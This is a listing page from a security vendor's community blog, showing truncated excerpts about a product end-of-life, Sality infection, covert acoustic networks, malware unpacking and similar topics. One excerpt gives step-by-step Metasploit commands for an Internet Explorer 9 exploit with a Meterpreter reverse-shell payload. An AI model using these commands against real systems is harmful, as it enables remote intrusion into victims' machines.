Video Screencast Help
Security Community Blog
Showing posts tagged with Network Access Control
Showing posts in English
Sara Pan | 03 Mar 2014 | 2 comments

We have an important update to share with you regarding Symantec Network Access Control. At Symantec, we actively monitor security threats and trends in the industry, and after careful review and consideration, we have made the decision to End of Life (EOL) Symantec Network Access Control. The growth of Bring Your Own Device (BYOD) and the integration of access control technology into networking devices offered by most network hardware vendors have reduced the need for standalone NAC solutions. The discontinuation of Symantec Network Access Control will free up valuable resources to focus on our endpoint security offerings, including advanced threat protection and protection from newer security risks that impact your enterprise today.

Moving forward, Host Integrity, a feature of Symantec Network Access Control, will be integrated into a future release of Symantec Endpoint Protection (SEP). Customers who have SEP entitlement can continue to use the Host Integrity feature....

Brandon Noble | 30 Dec 2013 | 2 comments

I guess we need to face it. Sality is here to stay.

We have been dealing with new Sality variants for more than 8 years and the Sality.AE family for a little over 5…the variants keep coming. It has become one of the most common file infectors reported by Enterprise customers. With its ability to move through shares and disable AV, it’s one of the most destructive and tricky threats we have out there. That said, it’s not too hard to stop, provided you have two things. The first is an understanding of how it spreads and infects, the second is a willingness to mount the proper defense while you seek out the hidden pockets of this threat and eradicate it.

So, first things first. How does it spread?

This is a file infector and it can only spread through shares. Its uses two methods, I refer to as a “Push” and a “Pull” to infect. Managing these attacks will keep the threat from spreading to more computers.

 

...

captain jack sparrow | 03 Dec 2013 | 0 comments

can transmit information between computers using high-frequency sound waves inaudible to the human ear. The duo successfully sent passwords and more between non-networked Lenovo T400 laptops via the notebooks’ built-in microphones and speakers. Freaky-deaky!
The infected victim sends all recorded keystrokes to the covert acoustical mesh network. Infected drones forward the keystroke information inside the covert network till the attacker is reached.

ref:
http://www.pcworld.com/article/2068525/researchers...

Brandon Noble | 29 May 2013 | 0 comments

Over the past several months we have had inquiries from concerned customers claiming Symantec was scanning their forward facing IPs for vulnerabilities. After some research and some extremely tense meetings it was determined that this was actually part of a service the customer had purchased and opt'ed in for and that perhaps the Web team had forgotten to let the SOC know what was going on. Sound familiar?

The service is part of Trusted Services and allows the customer to add the Norton Secured seal to their website.

Vulnerability Assessment Service can create multiple entries in the customer’s website's logs and could cause alerts from their perimeter IDS/IPS. Its recommended to create rules or filters for these entries to avoid an false positives.
Vulnerability Assessment Service uses the following...

kishorilal1986 | 17 Feb 2013 | 1 comment

Dear All,

As day by day security threat are increasing  and u need to more proactive approach to find latest details and make security tighten. As hackers group are continously working to break out security measures but at the same time organization spending lots of resource and money to make bussiness smooth and secure.

I think this is not just spending the money on IT security and having securty experts. makes u secure by implementing the security solutions. It is equally important to you how intellegently and smartly you take care each sides of security threats and configure it accordingly.

Please also read below threads for getting updates on some recent security threats

 

  • Shamoon virus targets energy sector infrastructure

           ...

Ashish-Sharma | 07 Jan 2013 | 1 comment

 

SNAC Related Implementation Guides, Best Practices, Troubleshooting guides, and Knowledge Base Articles

 

Obtaining the latest version of Symantec Endpoint Protection or Symantec Network Access Control

http://www.symantec.com/docs/TECH103088

Install and configure the Symantec Network Access Control (NAC) integrated enforcer plug-in for Microsoft DHCP servers

http://www.symantec.com/docs/TECH106233

 Symantec Endpoint Protection 11.0 / Symantec Network Access Control 11.0 Host Integrity Overview

http://www.symantec.com/docs/TECH102534

Creating and testing a Host Integrity Policy

http://www.symantec.com/docs/...

Fabiano.Pessoa | 27 Sep 2012 | 0 comments

Hello
We got a discovered vulnerability in IE 9 on 17/09/2012 which can be exploited as following command in Backtrack 5 R2

Metasploit:

- msfupdate
- Use exploit / windows / browser / ie_execcommand_uaf
- Set SRVHOST 192,168 ...
- Set PAYLOAD windows / Meterpreter / reverse_tcp
- Set LHOST 192,168 ...
- exploit

Let's beware the networking.

hugs

Jhildy11 Xcend Group | 14 Aug 2012 | 0 comments

In case you missed it, see the archived version from last weeks webinar " Learn How to Protect Even Your Hardest-to-Find IP with Intelligent Data Loss Prevention"

 

 

With the average cost of a breach now topping an incomprehensible $7 million, more and more organizations are looking to Data Loss Prevention solutions to protect their highest value data. Join XCEND, a Platinum Symantec partner and DLP Master Specialist, to learn how you can accurately detect and protect all types of confidential data wherever it is stored or used.  (54 min)
 
Here's the Link to see the Archived Version: https://www2.gotomeeting.com/register/430279362 or go to our website at www.xcendgroup.com  to...
Ctrox | 30 Jan 2012 | 1 comment

Aliens have invaded earth with the intent to wipe out mankind. But ex-scientist turned cable technician, David Levinson (Jeff Goldberg), helps mobilize a plan to use the “common cold” or computer “virus” to fight back against the alien species and bring down their defenses in the 1996 movie Independence Day.
 
While the story is fiction, the potential damage that a virus or malware can do to businesses and peoples’ lives is all too real. In fact, attackers unleashed an average of more than nine new threats every second in 2010.
 
The healthcare industry knows firsthand about virus outbreaks. Take the Conficker virus that infected hundreds of MRI devices around the world. In fact, healthcare leads the industry in data breaches with more than 400...

Dinesh Theerthagiri | 17 Nov 2011 | 1 comment

This article presents information on manual unpacking of protected malicious Windows executables using the OllyDbg debugger. It also involve in fully rebuild the import table so the file can be restored to its original state and executed. Many anti-virus vendors categorized UPX, NsPack, ASpack and many other PE packers as malicious software.

Packers ???

A 'Packer' is a compression routine that squeezes an executable file. These programs created to reduce disk space and make downloads faster. It makes difficult to understand the original file and make it tricky to match the file signature of a compressed file. Packers initially send PE internal structures and then it identifies PE header, Export table, and import table in new structures & attaches code segment before OEP, called as STUB .i.e. the compressed executable is shifted to data section of newly created file. PE header & section header is no more useful since data is compressed means...